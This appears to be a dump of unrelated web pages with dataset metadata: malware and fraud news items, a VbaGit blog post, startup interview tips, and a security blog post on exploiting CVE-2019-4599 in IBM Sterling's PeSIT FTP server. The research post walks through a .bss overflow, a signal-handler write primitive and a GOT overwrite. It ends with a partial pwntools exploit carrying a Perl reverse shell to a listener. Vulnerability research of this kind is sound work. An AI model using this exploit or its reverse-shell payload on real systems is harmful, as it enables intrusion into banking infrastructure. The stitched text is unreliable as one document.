"One worker communicates with the C&C server to download a new configuration and process it, while the other is triggered by the timer, checks for requirements and injects code into the Ad-related Activity classes of well-known Ad-SDK’s like Google’s AdMob and Facebook" - Check Point
Native code, injecting into legitimate Ad-SDKs (software development kit), and backdooring apps already in the Play Store allowed Haken to keep a low profile and generate revenue from fraudulent ad campaigns.
It is unclear how long the malware survived and the revenue it made but the low installation count suggests a small figure. If still present on their devices, users are advised to remove the following apps:
- Kids Coloring - com.faber.kids.coloring
- Compass - com.haken.compass
- qrcode - com.haken.qrcode
- Fruits Coloring Book - com.vimotech.fruits.coloring.book
- Soccer Coloring Book - com.vimotech.soccer.coloring.book
- Fruit Jump Tower - mobi.game.fruit.jump.tower
- Ball Number Shooter - mobi.game.ball.number.shooter
- Inongdan - com.vimotech.inongdan
Check Point reported to Google the 12 malicious apps found on Play Store and they are no longer available in the repository.
**Update [02/21/2020]**: Article updated with information of new apps containing the Joker trojan that are currently available from the Play Store
## Post a Comment Community Rules
## You need to login in order to post a comment
Not a member yet? Register Now | true | true | true | Joker malware that subscribes Android users to premium services without consent is giving Google a hard time as new samples constantly bypass scrutiny and end up in Play Store. | 2024-10-12 00:00:00 | 2020-02-21 00:00:00 | article | bleepingcomputer.com | BleepingComputer | null | null |
|
29,181,282 | https://ramblings.mcpher.com/integrate-vba-with-github/ | Integrate VBA with Github - Desktop liberation | Brucemcp | #### VBAGit
After Getting your apps scripts to Github I thought I’d have a go at doing something similar for VBA. If you are reading this, you’ll know that it’s very difficult to manage shared code, since VBA is really a container bound thing. You can do things with add-ins and by referencing other sheets, but the VBA environment is very specific to your machine and your folder structure. Sharing common code across Spreadsheet containers or between machines is just a mess. I have tried a few things in the past (actually they will still work but I wont be loading the latest version of code there any longer), such as How to update modules automatically in VBA which uses GIST to publish code from the web, but getting it there and figuring out dependencies was fairly manual. VbaGit is about managing your VBA code and getting it in and out of workbooks. If you distribute or share code, or need version control then this is probably of interest to you.
There’s a lot of words here, so if you want to skip it and get started, go here – Getting started with VbaGit or VBA and jsdoc
#### What VbaGit does
In the end, quite a lot actually – it kind of grew as I was playing around with it and realized what could be done. I find the automatic documentation especially useful
-
- Given a module or set of modules or classes, figures out the dependencies amongst the other modules or classes in your workbook. In other words – which classes and modules are used by a module. This allows you to split up a workbook – let’s say to extract and share libraries from a bigger project, and creates an info.JSON describing your repo. Using this method you can create multiple repos from one workbook project, and each repo will only contain the code it needs to make its main modules/classes compile.
- Automatically creates documentation in markdown about the dependency cross references, and also creates documentation about each procedure in each module describing the arguments and their types. I did something like this before in Automatic documentation but this is much more detailed and useful.
- Figures out the Excel references used by the source workbook and includes it in the dependency documentation and info.JSON
- Puts all that in a staging area by project. One project = one GitHub repo. This repo contains all the documentation mentioned above, and all the code and libraries needed for the selected modules. This staging area can used by a normal git client, or by the one written in VBA I include with the package.
- Commits everything in the staging area to GitHub (creating or updating a GitHub repo as necessary), taking care of version control and only updating changes so on. Once committed to GitHub, you have a full revision history and copy of each commit stored.
- Pulls a repo from GitHub directly into a workbook, setting it up with all the code it needs to support the project.
#### What VbaGit doesn’t do
- No sheets, data or forms are managed. Neither are local scripts associated with particular sheets or in the ThisWorkBook Module. This is because different Workbooks are likely to have different worksheet structures or updated data. VbaGit is just for code in a) ClassModules and b) StandardModules. If you have other stuff, you can put it in the repository yourself
- Dependencies on modules containing only public constants will be missed, since it only knows how to find functions, subs and classes. If you put them in a module with procedure dependencies then they will be carried forward okay.
- The VBA git client only works on the master branch for now. If you want to fork and create other branches, you can still use VbaGit to manage the local repo, and a normal windows git client to do all the other stuff.
- No doubt there will be other stuff. If you find anything, please join our community and let me know.
#### What’s in the repo
For the discussion, I’ll use the repo for the VbaGit project itself, which of course I used VbaGit to create.
Here’s what this repo looks like when automatically created and committed. You can find the repo for VbaGit here.
Here’s what the project looks like in the VBA IDE
#### The readme file
This is committed if there isn’t one in the repo, otherwise it leaves it alone. The idea is that you use the initial skeleton to build on. If you want the skeleton re-instated, just delete your readme from the repo. It doesn’t say much and looks like this. This is created and committed to guthub stage if there’s not already a README in the repository.
#### The dependency report
This describes what’s in the repo, a sample snip is shown below
Also in the dependency documentation you’ll see which Excel references were detected in the workbook being processed. VbaGit is unable to associate excel references with procedures and therefore know exactly which if these would be needed in a subset of the original workbook, so you can either choose to apply them manually in any workbook you create when importing from git, or have doImportGit do it automatically for you (in which case it will apply them all)
#### The cross reference document
This describes references between procedures, a sample snip is shown below
#### The info.json
This is used to create all the documentation above, and to control execution of VbaGit. Note that the info.json file will always be slightly newer than the one on github, since it records when it was committed after the commit completed. Take a look directly on github, it’s a little big to reproduce below.
#### The scripts folder
This is the source for all your scripts in your project and looks like this
It contains one file for each module, plus one document for each module. Here’s a snip of the documentation that was created automatically.
#### The libraries folder
If there are any, then all the libraries sources for each dependency needed by this project. Here’s a snip below. Each module or class has a code file as well as a documentation file the same as was shown in the scripts folder above
Each folder name matches a library, and contains the source for that library. Note that every library that is referenced for which sources are available are committed here – including libraries that are referenced by other libraries and so on. This list matched the dependency list in the dependencies.md report.
#### Technical writeup
You can find the repository for VbaGit here. Now to get started, go here – Getting started with VbaGit
Now take a look below for more on this subject
For help and more information join our community, follow the blog or follow me on Twitter . For how to do this for Google Apps Script, see Getting your apps scripts to Github | true | true | true | Page Content hide 1 VBAGit 2 What VbaGit does 3 What VbaGit doesn’t do 4 What’s in the repo 5 The readme file 6 The dependency report 7 The cross reference document 8 The info.json [...] | 2024-10-12 00:00:00 | 2019-03-26 00:00:00 | null | webpage | mcpher.com | Desktop liberation | null | null |
7,654,027 | http://pollenizer.com/know-getting-somewhere-startup | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
14,757,434 | http://www.wbur.org/edify/2017/07/11/masters-mit-poverty-lab | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
8,572,307 | https://translate.google.com/translate?sl=fr&tl=en&js=y&prev=_t&hl=fr&ie=UTF-8&u=http%3A%2F%2Fwww.francetvinfo.fr%2Ffaits-divers%2Fsept-personnes-liees-a-l-islam-radical-en-garde-a-vue-pour-escroquerie-a-la-banque-postale_737841.html&edit-text=&act=url | Escroquerie à la Banque postale : des islamistes radicaux présumés parmi les huit personnes en garde à vue | Franceinfo | # Escroquerie à la Banque postale : des islamistes radicaux présumés parmi les huit personnes en garde à vue
Les malfaiteurs auraient détourné 800 000 euros grâce à une faille de sécurité, selon RTL. Un autre suspect pourrait se trouver actuellement en Syrie.
Elles auraient profité d'une faille de sécurité pour dérober 800 000 euros à la Banque postale. Huit personnes sont en garde à vue, depuis mercredi 5 novembre, à Toulouse (Haute-Garonne) et Angers (Maine-et-Loire), pour "escroquerie en bande organisée". Selon les informations de RTL, certains des suspects seraient liés à l'islamisme radical.
Les arrestations de ces six hommes et deux femmes ont notamment été menées ont eu lieu dans l'agglomération Toulousaine, à Angers, mais aussi à Castres (Tarn). Selon la RTL, la plupart des personnes interpellées font l'objet d'une fiche "sûreté de l'Etat" établie par la Direction générale de la sécurité intérieure (DGSI), en raison de leurs liens avec l'islamisme radical. Certains habitent les Izards, à Toulouse, le quartier dont est originaire la famille de Mohammed Merah. RTL assure qu'un autre suspect pourrait même se trouver actuellement en Syrie. Le pôle anti-terroriste de Paris n'est cependant pas saisi de cette affaire, qui reste de droit commun.
## Une perte totale de 25 millions d'euros pour la banque
Les malfaiteurs auraient profité d'une faille dans le système Certicode, *"mis en place par la Banque postale pour sécuriser des virements intercomptes entre clients" *de l'établissement explique une source policière à l'AFP. Ils seraient parvenus à* "mettre en place des virements frauduleux et ponctionner des comptes à l'insu de leurs titulaires".* Cette escroquerie, qui aurait permis aux suspects de détourner 800 000 euros, a profité à d'autres arnaqueurs dans toute la France : au total, selon RTL, la Banque postale aurait perdu jusqu'à 25 millions d'euros avant de sécuriser son système.
Commentaires
Connectez-vous à votre compte franceinfo pour participer à la conversation. | true | true | true | Les malfaiteurs auraient détourné 800 000 euros grâce à une faille de sécurité, selon RTL. Un autre suspect pourrait se trouver actuellement en Syrie. | 2024-10-12 00:00:00 | 2014-11-06 00:00:00 | article | francetvinfo.fr | Franceinfo | null | null |
|
7,644,591 | http://mashable.com/2014/03/20/want-to-work-for-a-startup-10-questions-to-ask-your-interviewer/ | Want to Work for a Startup? 10 Questions to Ask Your Interviewer | Scott Gerber | In startups especially, job interviews are just as much for the interviewee as they are for the interviewer. Because there is often a lot at stake for a new company, it's wise to ask where you will fit in among founders and first hires -- and how you can make a direct impact on the company's success.
That's why I asked 10 entrepreneurs from the Young Entrepreneur Council (YEC) what questions they would pose for an interviewer at a startup. Here's what they had to say:
1. What one thing must be done?
I would ask what one thing must be accomplished for the startup to succeed. There are two reasons to ask this: It will determine if they have a clear, focused vision, and it will give you a sense of how your job should be aligned with that goal.
2. When is your next funding round?
3. What's your runway?
4. How does your product apply to my role?
- Brett Farmiloe, Internet Marketing Company
5. What are your founders' goals?
- Bobby Grajewski, Edison Nation Medical
6. What's your exit strategy?
- Susan Strayer LaMotte, Exaqueo
7. What is the sales strategy?
8. What's the focus for the next three months?
9. What is the culture and work environment like?
10. What is the problem you're solving? | true | true | true | Want to Work for a Startup? 10 Questions to Ask Your Interviewer | 2024-10-12 00:00:00 | 2014-03-20 00:00:00 | article | mashable.com | Mashable | null | null |
|
22,693,952 | https://blog.lexfo.fr/pentesting-pesit-ftp.html | Lexfo's security blog | null | # Introduction
A classical penetration test requires skills to assess a large variety of weaknesses, often dealing with common bug classes. Memory corruptions are rarely exploited during penetration tests. The reasons being, they can be risky (you do not want to crash a production system) and it can be time consuming (if you develop/adapt an exploit). It is also rather uncommon to have the opportunity to exploit a known memory corruption bug with a public script because both vendors and users tend to take their patching very seriously. Nevertheless, these kinds of weaknesses may enable attackers to gather powerful primitives, such as Remote Command Execution or secrets theft.
Furthermore, when it comes to the banking world, it is common sense that this kind of issue shall provoke a mighty fuss, especially if no patch is ever available. Nonetheless, being able to detect memory corruptions during security assessments may avoid technical or economic disasters by just decommissioning the vulnerable service.
Finally, let's be honest: legacy software is almost never audited since the major part is decommissioned whenever possible. However, the remaining part is almost never tested. The reason is simple: this kind of software is often *very delicate* to patch, leading users to avoid losing time in multiple vulnerability assessments. Typically, the first audit will purportedly pinpoint the most evident weaknesses. Memory corruption bugs that do not lead to crash will almost surely not be exploited, whenever detected.
Consequently, I propose you to follow my analysis for **CVE-2019-4599**. A path I had to cross during a classical penetration test assessment. I was not expecting such surprise at first :)
- The target
- Static analysis
- ALLO command handler
- Bypassing
`verif_num()`
- The Implementation
- Basic Test Cases
- Reconsidering the Test Cases
- Abusing Uninitialized Memory
- Dealing with Huge Overflow
- Leveraging Arbitrary write primitive
- Hunting the Arbitrary Execution Primitive
- Exploiting the bug
- Conclusion
- Demo
- Appendice
# The target
IBM Sterling PeSIT FTP service is part of a complete transaction environment, aimed at syncing files between large financial entities in order to track, for instance, foreign banks' cash withdrawal. This principle is called teleclearance.
Of course, those files usage - as well as their content - can vary, yet they are all transferred using some exchange protocol in the end. While international standards recommend using SWIFT, French banks have been using a protocol named **PeSIT** since the 1980s.
Additionally, an FTP server is included in the **Connect:Express** software suite. It is used as a fallback protocol in case a PeSIT link cannot be established between two French organizations.
Therefore, below are the main points of attacking the FTP server:
- When used by a bank, it is listening on the internet to communicate with other banking entities, although banks may typically position the service behind an IPSEC tunnel
- FTP protocol itself is one of the most known protocols, whose parts are described in several RFC
- More importantly, penetration test is more challenging with an exploit writing phase!
The second point is not really relevant since the implementation of FTP protocol does not seem to follow a specification that happens to be critical for the exploitation (RFC 959 p.30/31).
# Static analysis
Since the binary is closed source, let's start by disassembling it. Thankfully, the binary is not stripped and most functions are labeled in either French or French/English mix. Looking at the `main()`
function, we can see that local arguments and flags are handled using `getopt()`
as shown in the following screenshot:
Like any typical server, the binary starts by listening for incoming TCP connections. Once a connection has been established from a remote peer, the process gets `fork()`
'ed and `receive_commande()`
handles TCP payload sent by the client. That is, our main (remote) entry point:
`receive_commande()`
basically invokes two functions:
`TCP_RECV()`
: calls`recv()`
`analyse_commande()`
: dispatch the FTP command to the appropriate handler
Let's first analyze `TCP_RECV()`
. Here is a simplified version:
```
void* TCP_RECV(int mode)
{
int fd;
int cur;
if (mode == 2) {
// load "more data" (e.g. partial file upload)
cur = lit_parm->buf_lg;
fd = sock_dtp;
} else {
[0] cur = 0;
fd = sock_dcp; // incomming connection socket
}
[1] lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
if (lit_parm->buf_lg > 0) {
if (mode == 1) {
if (strf == 2) {
[2] lit_parm->buf_lg -= 2;
} else {
// ...
}
} else {
// ...
}
}
// ...
}
```
In other words, it fills the following **struct lit_parm_t** structure:
```
struct lit_parm_t {
char* buf; // pointer to user supplied data
int buf_lg; // length returned by recv() minus 2
// ...
int max_len; // max buffer length
}
```
In particular, `lit_parm->buf`
holds the whole read from the client with `recv()`
**[1]**, where `cur == 0`
(**[0]**).
**One might notice a very "curious" operation in [2]**. Yes, the
`lit_parm->buf_lg`
is decremented by 2. Honestly, I don't know why this statement exists but it actually leads to a bug (more on this later).`lit_parm`
itself is a **global** variable pointing to data allocated on the heap in **init()** (invoked at start up before `fork()`
):
```
void init()
{
// ...
input_net = malloc(130976);
// ...
lit_parm = calloc(1uLL, 32uLL);
lit_parm->buf = input_net;
lit_parm->buf_lg = 130976;
lit_parm->max_len = 130976;
// ...
}
```
In turn, `input_net`
is also a global variable pointing to the heap. One might notice, that "130976" looks like a *MAX_INPUT_SIZE* for the buffer.
Once the data has been received with `TCP_RECV()`
, `receive_commande()`
invokes `analyse_commande()`
which is the **main command dispatcher**. `analyse_commande()`
distinguishes two sets of commands:
- pre-authentication: HELP, STAT, USER/PASS, ALLO
- post-authentication: all the other commands
From an attack surface point of view, we either need to find a vulnerability in the pre-authentication commands or find a post-authentication bypass and then a vulnerability in the post-authentication commands. In the latter case, we would need "two vulnerabilities". That looks like more "work" and having **pre-auth bug is sexier**!
After a rough look at the different pre-auth commands, the focus has been set on the **ALLO** command.
# ALLO command handler
The **ALLO** command (for ALLOcate) is a command that can be called in **pre-authentication** mode. It is used to **allocate a sufficient space** prior to a file upload. Typically, the next command shall be STOR for instance.
As the RFC959 stands, the expected grammar is:
```
ALLO <SP> <decimal-integer>
[<SP> R <SP> <decimal-integer>] <CRLF>
```
Once data has been received in `TCP_RECV()`
(hence both `lit_parm->buf`
and `lit_parm->buf_lg`
have been filled), the **ALLO command handler** (invoked from `analyze_commande()`
) **tries to** do the following:
- Find the length of <decimal-integer> (character-wise)
- If <decimal-integer> is actually a number, copy user-provided data (i.e. <decimal-integer>) into the
`rem_file`
buffer
Let's check the implementation:
```
int i;
// find the number of characters of "<decimal-integer>" (stop at first space or ends of data)
[0] for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
[1] if (verif_num(i, (*lit_parm->buf + 5))) {
if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1;
else
copy_len = i;
[2] memcpy(rem_file, (*lit_parm->buf + 5), copy_len);
rem_file[copy_len] = 0;
// ...
```
In order to make things simpler, let's call the string located at 5 bytes past `lit_parm->buf`
: **PAYLOAD**.
So, the variable `i`
is set to the length of **PAYLOAD** in **[0]**. Then, there is a check that **PAYLOAD** is only composed of digits with `verif_num()`
in **[1]**. Finally, the buffer `rem_file`
is filled with **PAYLOAD** of size `copy_len`
in **[2]**.
One might immediately notice that there is no "length checks" during the `memcpy()`
in **[2]**. It is filled with user-controlled data (*PAYLOAD*) of size `copy_len`
into `rem_file`
. The global variable `rem_file`
itself is stored in the `.bss`
as a 256 bytes character array.
In other words, passing the following commands **leads to a buffer overflow in the .bss**:
```
ALLO 111...<252 times>...111111
^ start overflowing on the next variable in the .bss
```
At this point, the only "restriction" on **PAYLOAD**, is that it must only contain digits as enforced by `verif_num()`
. The latter returns true if **PAYLOAD** is only composed of digits OR if `i`
is zero.
This could look like the "big win" here yet "big win" does not equal "quick win" :-).
In fact, being restricted to "digit only" characters leads to harder exploitation. In the next section, we will show how to bypass this restriction and overflow the `rem_file`
buffer with almost arbitrary data.
# Bypassing `verif_num()`
In the previous section, we saw that we can trigger a buffer overflow on the `.bss`
but it came with a limitation: our **PAYLOAD** was restricted to digit characters.
## The Implementation
First, let's have a look at the `verif_num()`
implementation:
```
bool verif_num(int ctr, char *test_char)
{
int i;
for (i = 0; i < ctr && isdigit(test_char[i]); ++i)
{
}
return i == ctr;
}
```
In order to pass the check, the string `test_char`
must be composed of digits characters up to `ctr`
characters.
**Furthermore, if ctr is set to zero, verif_num() will always return true.**
Back to the **ALLO** handler code, we saw that `verif_num()`
's `ctr`
parameter was invoked using the `i`
variables computed here:
```
for (i = 0; lit_parm->buf_lg - 5 > i && lit_parm->buf[5 + i] != ' '; ++i)
{
}
```
and called here:
```
if (verif_num(i, (lit_parm->buf + 5))) {
...
}
```
## Basic Test Cases
Alright, let's analyze this part with some practical data. Here are our test cases:
```
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | -------- | ----------------------- |
| 0 | 'ALLO ' | 5 | 0 | true | 0 | with one space |
| 1 | 'ALLO a' | 6 | 0 | false | n/a | |
| 2 | 'ALLO 1' | 7 | 0 | true | 0 | two spaces before digit |
| 3 | 'ALLO a' | 7 | 0 | true | 0 | two spaces before char |
| 4 | 'ALLO 1' | 6 | 1 | true | 1 | |
| 5 | 'ALLO 1 ' | 7 | 1 | true | 1 | one space after |
| 6 | 'ALLO 12' | 7 | 2 | true | 2 | |
```
As we can see in case #0, #1, #4, #5 and #6, `verif_num()`
behaves as expected, as well as the `i`
value is correctly set. In turn, `copy_len`
equals `i`
.
However, looking at case #2 and #3, where two spaces are inserted after the **ALLO** command, we see that `i`
is **always set to zero**, thus `verif_num()`
also returns true!
That is, we reach the following code:
```
[0] if (lit_parm->buf_lg - 5 < i)
copy_len = i - 1; // <---- unreachable code ?!
else
copy_len = i;
[1] memcpy(rem_file, lit_parm->buf + 5, copy_len);
```
Back to the case #3, we see that our payload can be `ALLO<sp><sp>a`
or `ALLO<sp><sp>aaaaaaa...`
(two spaces). In other words, by using the "two spaces tricks" we can put some **arbitrary data** in **PAYLOAD**.
Alas, in those cases, `i`
is also set to zero, that is, `copy_len`
is set to zero! An overflow of 0 bytes cannot be called as such!
Instead, looking back to the line **[0]** in the previous snippet, it seems that this condition can **never be true** as `lit_parm->buf_lg`
has a minimum value of **5**... or... does it?
## Reconsidering the Test Cases
Remember `TCP_RECV()`
exposed earlier? Yes, there was a "curious line" after the call to `recv()`
:
```
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
// ...
lit_parm->buf_lg -= 2; // <---- what the hell ?!
```
So yeah, our previous test cases are wrong, let's rewrite them!
Back to the computation of `i`
, we see that if `lit_parm->buf_lg`
is lesser than `5`
, then `i`
will always be set to zero (it does not iterate in the `for`
loop). Hence, `verif_num()`
always returns true as well!
```
| #case | lit_parm->buf | lit_parm->buf_lg | i | verif_num() | copy_len | comment |
| ----- | ------------- | ---------------- | - | ----------- | ---------- | ----------------------- |
| 0 | 'ALLO ' | 3 | 0 | true | 0xffffffff | with one space |
| 1 | 'ALLO a' | 4 | 0 | true | 0xffffffff | |
| 2 | 'ALLO 1' | 5 | 0 | true | 0xffffffff | two spaces before digit |
| 3 | 'ALLO a' | 5 | 0 | true | 0xffffffff | two spaces before char |
| 4 | 'ALLO 1' | 4 | 0 | true | 0xffffffff | |
| 5 | 'ALLO 1 ' | 5 | 0 | true | 0 | one space after |
| 6 | 'ALLO 12' | 5 | 0 | true | 0 | |
```
In other words, if our **PAYLOAD** has size of zero or one character (no matter what), `copy_len`
is set to **0xffffffff**.
This is a **INT UNDERFLOW** baby, that leads to a huge `memcpy()`
on the `.bss`
!
We might benefit from it, yet it rises two issues:
- Overwrite 0xffffffff bytes starting from the
`.bss`
will certainly**crash**the process - Can we actually control the data (i.e. the
**PAYLOAD**) and not being limited to zero or one byte?
# Abusing Uninitialized Memory
Back to the `memcpy()`
called in the **ALLO** command handler, we saw that we can trigger a huge buffer overflow on `rem_file`
(located in the `.bss`
section). The code is:
```
memcpy(rem_file, lit_parm->buf + 5, copy_len);
```
As a reminder, `lit_parm->buf`
is set and only set in `recv()`
, that is, user-controlled data:
```
lit_parm->buf_lg = recv(fd, &lit_parm->buf[cur], lit_parm->max_len - cur, 0);
```
One thing to note is that `lit_parm->buf`
(initialized in `init()`
before the `fork()`
) is **NEVER RESET** between each `recv()`
call! Let's exploit this behavior to overflow the `rem_file`
buffer with **arbitrary data**.
Basically, the exploitation strategy becomes:
- call
**<5 bytes><ARBITRARY_DATA>**: will set the data in`lit_parm->buf`
- call
**ALLO<space><0 or 1 arbitrary byte>**: only overwrites the 5 or 6 first bytes of`lit_parm->buf`
and leaves the rest of the buffer untouched.
Of course, we can only control the data up to 130971 (130976 - 5) bytes. This is because of the `lit_parm->max_len`
restriction.
Looking at the memory layout of the process, this will overwrite **the whole .bss section** before hitting a NULL page and provoke a segfault!
That's one issue solved! There is one more though: how to exploit the fact that the huge overflow (0xffffffff bytes) will provoke a segfault?
# Dealing with Huge Overflow
Generally, when a buffer overflow bug overwrites a very large portion of contiguous (virtual) memory, there is a "high probability" that it will provoke a page fault (trying to write to non-mapped memory and/or read-only pages). In those cases, the kernel emits a **SIGSEGV** signal to the process that is generally killed.
However, looking at the `init()`
function, we see that a lot of various signal handlers are set up:
```
puts("init: ***** signals caught");
signal(1, 1);
signal(2, sig_fin);
signal(3, sig_fin);
signal(4, sig_fin);
signal(5, 1);
signal(6, sig_fin);
signal(8, sig_fin);
signal(7, sig_fin);
signal(11, sig_fin); // SIGSEGV
signal(31, sig_fin);
signal(13, 1);
signal(14, 1);
signal(15, sig_fin);
signal(20, 1);
signal(17, sig_chld);
signal(21, 1);
signal(22, 1);
signal(29, 1);
signal(10, sig_usr1);
signal(12, sig_usr2);
```
Therefore, the binary binds a signal handler for the **SIGSEGV** signal: `sig_fin()`
. In other words, if our overflow provokes a SIGSEGV during the call to `memcpy()`
, the execution flow is redirected to `sig_fin()`
.
# Leveraging Arbitrary write primitive
As shown above, a signal handler is defined around several signals that are sent to the process upon received signals. Let us see what `sig_fin()`
, the handler function, does in this crude pseudo-code view:
```
*(trfpar + 235) = 8000;
if ( strf == 1 )
{
v3 = e_msg_gtrf;
*e_msg_gtrf->gap0 = "01";
v3->gap0[2] = '4';
}
else
{
e_msg_gtrf_ = e_msg_gtrf;
*e_msg_gtrf->gap0 = 14641;
e_msg_gtrf_->gap0[2] = 54;
}
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL); // <---- HERE
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
```
What we notice here is an explicit call to `memcpy()`
GLIBC function. The source and destination parameters are global variables that we can overwrite with the huge buffer overflow. `e_msg_gtrf->log_buf`
would ideally be clobbered to point to the wished write zone, and `trfpar`
new value should be a pointer to the source data to be copied.
As shown below, the variables we need to overwrite are located after `rem_file`
, which is good news for us:
**We conclude it is possible to control the first two parameters in the memcpy() call!**
Here is a simplified schema of the BSS overwrite right before the Segmentation Fault, hence the call to `sig_fin()`
# Hunting the Arbitrary Execution Primitive
Alright, so far we know that we have an arbitrary write ability of 1780 bytes, no less. How can we abuse it to take control over the execution flow? We saw earlier that the shutdown function `sig_fin()`
was the key for exploiting the service. Nevertheless, it is not unnecessary to mention there is a compelling requirement to succeed in the effort for writing a reliable and fast exploit. Since there is only one chance to control the execution flow before the process ends, the written data must directly lead to command execution if ever possible.
Ideally, we would like to call a function like `system()`
with a controlled parameter that would allow us to execute a reverse shell (connect-back). Alas, `system()`
is not imported by the binary.
Instead, looking at various imported symbols, we figured out that only `execl()`
was available. As a reminder, it has the following signature:
```
int execl(const char *path, const char *arg, ...);
```
More parameters have to be under our control. **Four**, to spawn a remote shell... We will have to troubleshoot this issue. In the binary, `execl()`
is only invoked in the `r_exit()`
function, which is called by the "parent process" during program exit.
We have no choice but find a way to have `execl()`
called with controlled parameters.
# Exploiting the bug
One major pitfall is the copy size (**0x6f4** = **1780** bytes) of the write-what-where since it is a hardcoded value. Exploit writers may aim to avoid unpleasant behaviors from the process by trying to only overwrite one of the last addresses in the `.got`
section.
Fortunately for us - and since `fork()`
is called upon every incoming connection -, a crash will not disrupt the parent service so we can let the process crash after we obtain the mighty shell.
Before exploiting for real, let's check the enabled protections for this binary:
Complete memory randomizing and Read-Only RElocations are not enabled **at all**. As predicted, that makes the Global Offset Table an ideal victim for a good old control flow hijacking, and since the `.bss`
section is mostly under our control, we may use it to store payloads. All we have to do is to overwrite the `.got`
entry of a GLIBC function that is called right after the arbitrary copy, with a known and controlled location address. Easy peasy!
As said earlier, it is safer to overwrite the least entries as possible, to reduce the chances to have the program crash or behave badly. Overwriting the last values facilitates this.
Maybe following the good segfault handler function code could help whilst confronting it to `.got`
candidates. What about `send_tom_queue()`
, which is issued right after the `memcpy()`
call?
```
memcpy(e_msg_gtrf->log_buf, trfpar, 1780uLL);
v5 = *env_monit;
send_tomqueue(*env_monit, *(env_monit + 8));
```
`time()`
appears to be a viable candidate since it is among the first running functions after `send_tom_queue()`
is invoked by `sig_fin()`
. It would enable fast execution flow preemption. Unfortunately `time()`
does not carry any parameter; using it directly may undermine the exploit reliability.
However, we should keep in mind that most of the `.bss`
is under our control, and that the software is a state machine that pushes and pulls data variables that are defined globally. The only requirement is to have controlled buffer pointers in the function parameters dedicated registers (RDI, RSI, RDX etc.).
After a quick review, one function looks rather handy and adequate: `TCP_SEND()`
.
As shown above `env_param`
and `sock_dcp`
are used here by `send()`
, which is among the latter parts of the Global Offset Table entries. Luckily, this parameter lies at `0x644778`
whereas `rem_file`
, the buffer that we initially overflowed in `.bss`
, lies at `0x63AF60`
. This means `env_param`
can be overwritten 38936 bytes ahead of the beginning of our buffer.
Also, to avoid losing the flow or undergoing unexpected crashes, we need to neutralize `.got`
entries that are placed after `send()`
with addresses to `ret`
assembly instruction. This will make any unexpected call to imported functions do nothing and go back to our normal flow.
To sum it up, `time@.got`
should be clobbered to point to `TCP_SEND()`
, who calls `send(controlled_param1, controlled_param2, controlled_param3)`
, and `send@.got`
could be rewritten, therefore calling `send()`
would instead result in calling `execl@.plt`
. This function is imported from GLIBC as per a program function called `r_exit()`
.
The final call should be as such:
```
execl("/bin/sh", "/bin/sh" "-c", "echo win")
^- path ^- argv[0] ^- argv[1] ^- argv[2]
```
**Hang on chingón...**
Only three parameters are controlled when issuing a call to `send()`
. So far, there is no real need to look for another function call ensuring a total control of parameters, to obtain command execution. Indeed this constraint occurs in Bash since it interprets text between quotes as distinct arguments... whereas other language interpreters won't.
Thus, using `python -c`
or `perl -e`
without quotes should work since `execl()`
is not using shell to spawn executable files.
The command execution could then be achieved by using:
```
execl("/usr/bin/perl", "/usr/bin/perl", "-e[CMD]")
```
# Conclusion
Due to its lack of binary protections, it was possible to exploit this software during a penetration test assignment. A properly mitigated binary would have forced us to find another bug for leaking memory addresses, or poison the `.bss`
section much more delicately. It requires another technique to achieve code execution since the Global Offset Table would be in Read Only mode. For instance, since new client sessions are `fork()`
'ed into a new process that has its memory segments at the same place as the parent.
So one could find the base address by attempting to write at many places and track crashes. Once the randomization is defeated, several techniques - such as overwriting `__exit_funcs`
- lead to execution flow hijacking. It is however probable that a more complex payload execution technique, such as stack pivot + ROP, would be required.
A few other memory corruption bugs might still be exploitable depending on the context, since this kind of application is almost never audited by external researchers. Plus, since the exploit was written during a penetration testing assessment, the provided solution might not be the best one due to time requirements.
Note: A patch was issued to remediate the issue a few months ago. Is it convincing? Maybe :)
# Demo
# Appendice
Exploit code using python2 pwntools (sorry!)
```
#!/usr/bin/env python2
# IBM Sterling CX FTP Service
# Version: v1.5.0.12
# cve: CVE-2019-4599
#
# Proof-of-Concept state
# python ftp_pesit_exploit.py -r <target_ip> -p <PORT> -l <listener_ip>
import sys, time
from optparse import OptionParser
from pwn import options, remote, listen, randoms, log, p64
parser = OptionParser()
parser.add_option("-l", "--local-addr", dest="localip",
help="Local address for connect back", metavar="LOCALADDR",
default="127.0.0.1")
parser.add_option("-Y", "--local-port", dest="localport",
help="Local port for connect back", metavar="LOCALPORT",
default="4444")
parser.add_option("-r", "--remote-addr", dest="remoteip",
help="Remote target address", metavar="REMOTEADDR",
default=None)
parser.add_option("-p", "--remote-port", dest="remoteport",
help="Remote target port", metavar="REMOTEPORT",
default=5003)
(options, args) = parser.parse_args()
if __name__ == '__main__':
if (options.remoteip is None):
log.failure("Please specify a target address and port.")
sys.exit(1)
lport = options.localport
raddr = options.remoteip
lip = options.localip
bc = listen(lport)
conn = remote(raddr, options.remoteport)
revshell = 'use Socket;$i="'
revshell += lip
revshell += '";$p='
revshell += str(lport)
revshell += ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if('
revshell += 'connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");'
revshell += 'open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
cmd = "-eeval{" + revshell + "}"
cmd += "\x00"
bin = '/usr/bin/perl'
conn.readuntil(')')
payload = ""
payload += p64(0xB16B00B54DADD135)
payload += bin
payload += '\x00' * (16 - len(bin))
# .bss base: 0x633940
payload += p64(0) # Clean beginning
payload += p64(0x62f5d8) # &send@.got
payload += p64(0x63af68) # execl argv[0]
payload += p64(0x63afa0) # execl argv[1]
payload += p64(0x0)
payload += cmd
payload += randoms(840 - len(cmd))
payload += p64(0x63b2f0) # sig_fin() memcpy() source (for .got overwrite)
got = ""
got += p64(0x406d40) # overwriting send() w/ &execl@plt
got += p64(0x400534) * 29 # ret
